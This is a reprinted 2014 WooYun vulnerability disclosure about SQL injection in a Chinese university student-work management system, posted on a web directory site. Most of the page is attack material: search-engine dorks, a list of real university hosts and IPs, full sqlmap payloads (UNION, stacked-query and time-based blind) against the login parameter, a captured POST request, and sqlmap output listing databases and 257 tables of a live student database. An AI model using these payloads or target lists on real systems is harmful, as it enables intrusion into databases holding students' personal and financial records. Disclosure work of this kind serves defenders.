网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

[公开漏洞]某高校管理系统存在通用型SQL注入漏洞

来源:WooYun 浏览:553次 时间:2014-06-25
简介:某高校管理系统存在通用型SQL注入漏洞 相关厂商: 西安奥达软件工程有限公司漏洞作者:Mr.leo 提交时间:2014-03-27 11:30 公开时间:2014-06-25 11:30 漏洞类型:SQL注射漏洞危害等级:高 自评Rank

某高校管理系统存在通用型SQL注入漏洞 相关厂商: 西安奥达软件工程有限公司 漏洞作者:Mr.leo 提交时间:2014-03-27 11:30 公开时间:2014-06-25 11:30 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:15 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: 无 漏洞详情 披露状态:

2014-03-27:细节已通知厂商并且等待厂商处理中
2014-04-01:厂商已经确认,细节仅向厂商公开
2014-04-04:细节向第三方安全合作伙伴开放
2014-04-11:细节向核心白帽子及相关领域专家公开
2014-04-21:细节向普通白帽子公开
2014-05-11:细节向实习白帽子公开
2014-06-25:细节向公众公开

简要描述:

某高校管理系统存在通用型SQL注入漏洞

详细说明:

西安奥达软件工程有限公司旗下高校学生工作管理系统前台及后台均存在注入漏洞



1、高校学生工作管理系统前台



intitle:学生工作管理系统 Login/List.aspx?ID=



530.jpg





http://202.117.112.29/login/List.aspx?ID=10



http://xg.chd.edu.cn/Login/List.aspx?ID=99



http://xg.snnu.edu.cn/Login/List.aspx?ID=99



http://202.200.16.19/login/List.aspx?ID=99



http://202.200.168.108/Login/List.aspx?ID=99





以http://xg.snnu.edu.cn/Login/List.aspx?ID=99为例



sqlmap identified the following injection points with a total of 100 HTTP(s) requests:

---

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录

---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录

---

current user: 'auda'

current database: 'StudWorkXiDian'

available databases [7]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] StudWorkXiDian

[*] tempdb



可跨库

Database: pubs

[14 tables]

+----------------------+

| [dbo/awthors] |

| [dbo/discounts] |

| [dbo/employee] |

| [dbo/jobs] |

| [dbo/pwb_info] |

| [dbo/pwblishers] |

| [dbo/roysched] |

| [dbo/sales] |

| [dbo/stores\t] |

| [dbo/sysconstraints] |

| [dbo/syssegments] |

| [dbo/titleawthor] |

| [dbo/titles\r\t] |

| [dbo/titleview] |

+----------------------+





2、高校学生工作管理系统后台



关键字:inurl:/Login/loginpageforuserb.aspx





http://202.117.112.29/Login/loginpageforuserb.aspx



http://xg.chd.edu.cn/Login/loginpageforuserb.aspx



http://xg.snnu.edu.cn/Login/loginpageforuserb.aspx



http://202.200.16.19/Login/loginpageforuserb.aspx



http://202.200.168.108/Login/loginpageforuserb.aspx



http://job.xaufe.edu.cn/Login/loginpageforuserb.aspx



http://219.244.0.28/Login/loginpageforuserb.aspx



http://202.118.166.23/Login/loginpageforuserb.aspx



http://xsc.caac.net/Login/loginpageforuserb.aspx



以http://202.117.112.29/Login/loginpageforuserb.aspx为例



用户名处没有过滤(txtUserId),导致注射



burp抓包



POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1

Host: 202.117.112.29

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://202.117.112.29/Login/loginpageforuserb.aspx

Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 719



__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95



Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9

kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP

lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW

PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU

9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID

lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W

NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ

CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt

UserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+C

HAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(

68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58),

NULL-- &txtPwd=1&RadioButtonList1=1&Button1=? ?



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9

kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP

lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW

PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU

9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID

lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W

NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ

CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt

UserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=? ?



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9

kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP

lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW

PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU

9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID

lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W

NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ

CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt

UserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=? ?

---

[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2000

[15:36:02] [INFO] fetching current user

current user: 'auda'

[15:36:02] [INFO] fetching current database

current database: 'StudWorkXiDian'

[15:36:02] [INFO] fetching database names

[15:36:02] [INFO] the SQL query used returns 7 entries

[15:36:02] [INFO] resumed: "master"

[15:36:02] [INFO] resumed: "model"

[15:36:02] [INFO] resumed: "msdb"

[15:36:02] [INFO] resumed: "Northwind"

[15:36:02] [INFO] resumed: "pubs"

[15:36:02] [INFO] resumed: "StudWorkXiDian"

[15:36:02] [INFO] resumed: "tempdb"

available databases [7]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] StudWorkXiDian

[*] tempdb





257张表



Database: StudWorkXiDian

[257 tables]

+-------------------------------+

| dbo.LogTemp |

| dbo.Test |

| dbo.Vstipend_ApplyInfo |

| dbo.Vsubsidy_ApplyInfo |

| dbo.[tsys_Modules_测试] |

| dbo.dtproperties |

| dbo.sysconstraints |

| dbo.syssegments |

| dbo.tAcc_File |

| dbo.tAppoinmentRelation |

| dbo.tAppointment |

| dbo.tAppointmentType |

| dbo.tAppointmentTypeExplain |

| dbo.tArr_Accessories |

| dbo.tArr_ArrType |

| dbo.tArr_Auditing |

| dbo.tArr_requiteType |

| dbo.tCadre_InWork |

| dbo.tCadre_OutWork |

| dbo.tCadre_StudWork |

| dbo.tDorm_Area |

| dbo.tDorm_Bed |

| dbo.tDorm_Building |

| dbo.tDorm_ChargeHistory |

| dbo.tDorm_History |

| dbo.tDorm_RewardHistory |

| dbo.tDorm_Room |

| dbo.tDorm_RoomMaster |

| dbo.tDorm_RoomType |

| dbo.tDrom_BuildingUser |

| dbo.tFile_Video |

| dbo.tGB_GMZ |

| dbo.tGB_HYZK |

| dbo.tGB_JKZK |

| dbo.tGB_SJGGHDQ |

| dbo.tGB_XB |

| dbo.tGB_XW |

| dbo.tGB_XZQH |

| dbo.tGB_ZZMM |

| dbo.tJQRY_Apply |

| dbo.tJQRY_SP |

| dbo.tJQRY_Type |

| dbo.tOther_ArcAgent |

| dbo.tOther_ArcBase |

| dbo.tOther_ArcContent |

| dbo.tOther_ArcItem |

| dbo.tOther_ArcTurnOver |

| dbo.tPoor_Student |

| dbo.tPopedom_Atom |

| dbo.tReg_register |

| dbo.tReplyAppointment |

| dbo.tSchoolLoanLevel |

| dbo.tSchoolLoanProportion |

| dbo.tSchoolLoanRefund |

| dbo.tSchoolLoans |

| dbo.tStudCadre_Info |

| dbo.tStudCadre_Type |

| dbo.tStudCadre_Unit |

| dbo.tStud_AllowApply |

| dbo.tTemp_Apply |

| dbo.tarm_AwardList |

| dbo.tarm_CentType |

| dbo.tarm_StudCourse |

| dbo.tarm_StudLevy |

| dbo.tarm_StudRecord |

| dbo.tarm_policy |

| dbo.tarr_Info |

| dbo.tarr_repay |

| dbo.tasl_Affirm |

| dbo.tasl_Bank |

| dbo.tasl_BankAuditing |

| dbo.tasl_BankBargain |

| dbo.tasl_Breach |

| dbo.tasl_End |

| dbo.tasl_Extend |

| dbo.tasl_Familial |

| dbo.tasl_Imburse |

| dbo.tasl_LoanType |

| dbo.tasl_Postponed |

| dbo.tasl_SchoolAuditing |

| dbo.tasl_SchoolAuditingIdea |

| dbo.tasl_StudRequisition |

| dbo.tasl_Whither |

| dbo.tbase_Department |

| dbo.tbase_Teacher |

| dbo.tbase_User |

| dbo.tcgt_StudCourse2 |

| dbo.tcgt_StudCourse3 |

| dbo.tcgt_StudRecord2 |

| dbo.tcgt_StudRecord3 |

| dbo.tcgt_stdResultCell |

| dbo.tcgt_stdResultCell2 |

| dbo.tcgt_stdResultCell3 |

| dbo.tcgt_stdScale2 |

| dbo.tcgt_stdScale3 |

| dbo.tcmoe_RewardLevel |

| dbo.tcmoe_RewardType |

| dbo.tcmoe_StatusChangeCause |

| dbo.tcmoe_StatusChangeType |

| dbo.tcode_Academic |

| dbo.tcode_BloodType |

| dbo.tcode_CultivateMode |

| dbo.tcode_Educate |

| dbo.tcode_Emigrant |

| dbo.tcode_Job |

| dbo.tcode_LoanState |

| dbo.tcode_Post |

| dbo.tcode_ProSchoolAccount |

| dbo.tcode_PsychologyLevel |

| dbo.tcode_StudType |

| dbo.tcode_TeacherRole |

| dbo.tcode_poorType |

| dbo.tcpt_BranchActivity |

| dbo.tcpt_ClassRelation |

| dbo.tcpt_Document |

| dbo.tcpt_MemberStudy |

| dbo.tcpt_PartyActive |

| dbo.tcpt_PartyBranch |

| dbo.tcpt_PartyMember |

| dbo.tcpt_PartyPrep |

| dbo.tcpt_PersonRelation |

| dbo.tcpt_Requisition |

| dbo.terr_Accessories |

| dbo.terr_Auditing |

| dbo.terr_Auditing2 |

| dbo.terr_ErrCause |

| dbo.terr_ErrInfo |

| dbo.terr_ErrType |

| dbo.terr_PunishType |

| dbo.terr_Remove |

| dbo.titem_PartyBranchType |

| dbo.titem_PartyMemberType |

| dbo.titem_PartySchoolType |

| dbo.tmem_BookEnrol |

| dbo.tmem_ChooseCadre |

| dbo.tmem_Development |

| dbo.tmem_DevelopmentNum |

| dbo.tmem_MemBerDocment |

| dbo.tmem_MemCharge |

| dbo.tmem_Member |

| dbo.tmem_OrgType |

| dbo.tmem_Party |

| dbo.tmem_PartyNum |

| dbo.tmem_Record |

| dbo.tmem_Rewards |

| dbo.tmem_TrainDepartment |

| dbo.tmem_TrainManInfo |

| dbo.tmem_orgMan |

| dbo.tmem_organization |

| dbo.tmema_ActivityApply |

| dbo.tmema_ActivityAudit |

| dbo.tmema_ActivityField |

| dbo.tmema_AssnJob |

| dbo.tmema_AssnMember |

| dbo.tmemp_Activity |

| dbo.tmemp_ComAuthor |

| dbo.tmemp_ComManuscript |

| dbo.tmemp_ComReport |

| dbo.tmemp_PublicationIssue |

| dbo.tmemp_PulicJob |

| dbo.tpopedom_UserBackManage |

| dbo.tpopedom_UserModule |

| dbo.treward_Information |

| dbo.treward_InformationG |

| dbo.treward_TypeG |

| dbo.tsafety_InsurePayforMoney |

| dbo.tsafety_InsureRegStudent |

| dbo.tsafety_SafetyGrade |

| dbo.tsafety_Type |

| dbo.tschol_Annotion |

| dbo.tschol_Apply |

| dbo.tschol_Classify |

| dbo.tschol_Quotas |

| dbo.tschol_RankObj |

| dbo.tssc_History |

| dbo.tstipend_Annotion |

| dbo.tstipend_Apply |

| dbo.tstipend_Apply_Temp |

| dbo.tstipend_Classify |

| dbo.tstipend_Quotas |

| dbo.tstipend_RankObj |

| dbo.tstud_Accessories |

| dbo.tstud_CardPrint |

| dbo.tstud_CardPrintFiled |

| dbo.tstud_Family |

| dbo.tstud_FieldEdit |

| dbo.tstud_Student_BKS |

| dbo.tstud_Student_Temp_BKS |

| dbo.tstud_Student_Temp_YJS |

| dbo.tstud_Student_YJS |

| dbo.tsubsidy_Annotion |

| dbo.tsubsidy_Apply |

| dbo.tsubsidy_Apply_Temp |

| dbo.tsubsidy_Classify |

| dbo.tsubsidy_Quotas |

| dbo.tsubsidy_RankObj |

| dbo.tsys_Download |

| dbo.tsys_FriendlyLink |

| dbo.tsys_Notice |

| dbo.tsys_NoticeType |

| dbo.tsys_Options |

| dbo.tsys_VoteList |

| dbo.tsys_VoteProject |

| dbo.tsys_VoteRen |

| dbo.tsys_loginLog |

| dbo.tsys_loginSession |

| dbo.twork_Apply |

| dbo.twork_Apply_Temp |

| dbo.twork_CheckIn |

| dbo.twork_Department |

| dbo.twork_PayMoney |

| dbo.twork_PostObj |

| dbo.twork_PostType |

| dbo.txm_PYFS |

| dbo.txm_SS |

| dbo.txm_XL |

| dbo.txm_XSLX |

| dbo.txm_XSZT |

| dbo.vAloan_ListAff |

| dbo.vAloan_ListBasic |

| dbo.vAloan_ListExtend |

| dbo.vArr_ApplyInfo_BKS |

| dbo.vArr_ApplyInfo_YJS |

| dbo.vCadreGroup_state |

| dbo.vDorm_AllRoomDetail |

| dbo.vDorm_Bed |

| dbo.vDorm_BuidingCode |

| dbo.vDorm_CanBePreared |

| dbo.vDorm_CanUseBed |

| dbo.vDorm_Preared |

| dbo.vDorm_UsedBed |

| dbo.vDorm_building |

| dbo.vDorm_room |

| dbo.vDorm_student |

| dbo.vSchol_QuotaForDept |

| dbo.vSchoolLoans_BKS |

| dbo.vbase_Department |

| dbo.vcgt_StudSumRecord2 |

| dbo.vcgt_StudSumRecord3 |

| dbo.vcgt_student |

| dbo.vparty_PersonRelation |

| dbo.vparty_StatBranchSum |

| dbo.vpopedom_UserModule |

| dbo.vschol_QuotaForClass |

| dbo.vstipend_Classify |

| dbo.vstipend_QuotaForClass |

| dbo.vstipend_QuotaForDept |

| dbo.vstipend_QuotaForGrade |

| dbo.vstud_Student_BKS |

| dbo.vstud_Student_Temp_BKS |

| dbo.vstud_Student_YJS |

| dbo.vsubsidy_Classify |

| dbo.vsubsidy_QuotaForClass |

| dbo.vsubsidy_QuotaForDept |

| dbo.vsubsidy_QuotaForGrade |

| dbo.vtstud_Student_Temp_YJS |

| dbo.vwork_Department |

+-------------------------------+









漏洞证明:

已经证明

修复方案:

过滤多个参数

版权声明:转载请注明来源 Mr.leo@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-04-01 09:12

厂商回复:

CNVD确认并复现所述多个实例情况,验证和处置工作均由CNCERT转发给上海交通大学网络信息中心完成。

最新状态:

暂无


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/2036.html

好玩的手游下载

猜你喜欢

推荐站点

  • 国厨盛宴国厨盛宴

    佛山市南海区嘉怡西餐厅(简称\"国厨盛宴\")是一家专注于珠三角地区的高端餐饮定制服务企业。在嘉怡西式餐饮为基础,整合了国力餐饮策划公司、国邦餐饮咨询公司、焰渝餐饮管理公司。于2016年3月正式更名为“广东国厨盛宴餐饮定制”, 公司出品全部来自香港、广东十年以上中西餐饮宴会实践经验丰富的业内专业星级大厨,国厨盛宴是融合了中西宴会外卖特色具一体,积累了多年的实践经验的一家公司。 国厨盛宴的餐房、现场执行及客户服务均由香港资深专业人士负责,拥有丰富的餐饮定制配餐服务管理经验及餐饮行饮服务团队,从客服、采购、厨业经营经验。 无论是大型商业活动(100-3000人)还是小型(20-100人)的私人宴请,无论您的活动是在室内、室外、办公室,还是在公园、体育场、展厅、发布中心、别墅、郊外,都能为您提供超五星级的专业餐饮服务。除了为您提供精致的外烩美食外卖,我们还可以根据您的需要,结合宴会活动的每一环节、流程,为您提供活动策划、会场布置、节目安排、花艺服务等增值服务,为您节省宝贵的时间。

    guochushengyan.com
  • 皇家馬車家纺官网皇家馬車家纺官网

